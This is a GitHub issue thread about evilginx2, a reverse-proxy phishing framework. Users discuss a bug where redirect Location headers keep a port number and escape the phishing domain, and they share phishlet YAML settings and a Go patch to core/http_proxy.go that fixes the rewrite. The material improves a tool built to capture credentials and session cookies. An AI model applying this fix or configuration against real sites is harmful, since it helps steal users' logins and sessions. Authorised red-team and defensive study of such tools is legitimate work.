### ISSUE TITLE
evilginx2 doesn't replace hostname in Location header for a Temporary Redirect

### ISSUE THREAD

**Issue by hypnoticpattern** [kgretzky/evilginx2#118]
First of all I want to compliment you for the solid work. 
I am experiencing an issue with evilginx2 that doesn't replace the hostname in the Location HTTP header from a Redirect response. 
During the authentication process the server sends a response redirecting the client to a different subdomain for the last step of the authentication:

`from: https://legitSubdomain2.legitSubdomain1.legitDomain.com`

`HTTP/1.1 307 Temporary Redirect`
`Connection: close`
`Content-Type: text/html; charset=utf-8,text/html; charset=utf-8`
`Date: Sat, 24 Nov 2018 21:17:10 GMT`
`Location: https://legitSubdomain3.legitSubdomain2.legitSubdomain1.legitDomain.com:443/something/somethingElse/?client-request=xxxxxx`
`Server: ServerName`
`Content-Length: 0`

The legitSubdomain3.legitSubdomain2.legitSubdomain1.legitDomain.com is already in the proxy_hosts section of my yaml file and requests that contain that path in the HTTP body are handled correctly by evilginx2. 

`- {phish_sub: 'legitSubdomain1', orig_sub: 'legitSubdomain1', domain: 'legitDomain.com', session: true, is_landing: false}`
`- {phish_sub: 'legitSubdomain2.legitSubdomain1', orig_sub: 'legitSubdomain2.legitSubdomain1', domain: 'legitDomain.com', session: true, is_landing: false}`
`- {phish_sub: 'legitSubdomain3.legitSubdomain2.legitSubdomain1', orig_sub: 'legitSubdomain3.legitSubdomain2.legitSubdomain1', domain: 'legitDomain.com', session: true, is_landing: false}`

`...`

`- {triggers_on: 'legitSubdomain2.legitSubdomain1.legitDomain.com', orig_sub: 'legitSubdomain3.legitSubdomain2.legitSubdomain1', domain: 'legitDomain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}`

**Comment by kgretzky** [comment]
Thanks a lot! This would indeed be a bug. I don't think Evilginx currently handles port values after `:` when parsing the hostname, so this definitely would make it an issue.

Thanks for a fix suggestion. I will get to fixing it in upcoming days.

**Comment by hypnoticpattern** [comment]
You are welcome! I sent a pull request containing the fix I used in my fork.

**Comment by hash3liZer** [comment]
This issue still isn't resolved. Evilginx2 is still treating the port as the part of the hostname which is causing the mismatch.

**Comment by kgretzky** [comment]
Should be fixed in `2.4.0`

**Comment by phi-el** [comment]
I fell into the same issue with Version 2.4.1.
The problem is that the var *r_url* sometimes still includes the port like "demo.me:443". 
By placing 
**file core/http_proxy.go:**
```
func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) {
        //NEW DEBUGGING INSERT BELOW
	log.Debug("hostname is %s", hostname)
	if hostname == "" {
		return hostname, false
	}
	prefix := ""
	if hostname[0] == '.' {
		prefix = "."
		hostname = hostname[1:]
	}
        //NEW DEBUGGING INSERT BELOW
	log.Debug("hostname is now %s", hostname)
        ...
```
you can find out that on some redirects the port is included into the hostname.

Here is a (maybe dirty) quick fix to address this problem (normally i don't write go^^) 
**file core/http_proxy.go:**
```
                        // if "Location" header is present, make sure to redirect to the phishing domain
			r_url, err := resp.Location()
			// NEW INSERT
			if r_url != nil {
				if strings.Contains(r_url.Host, ":"){
					r_url.Host = strings.Split(r_url.Host, ":")[0]
				}
			}
			// FINISHED NEW INSERT
			if err == nil {
				if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok {
					r_url.Host = r_host
					resp.Header.Set("Location", r_url.String())
				}
			}
```
I'm currently working on a business laptop, so I'm not able to submit a merge request. 
Maybe I have later time for that :)
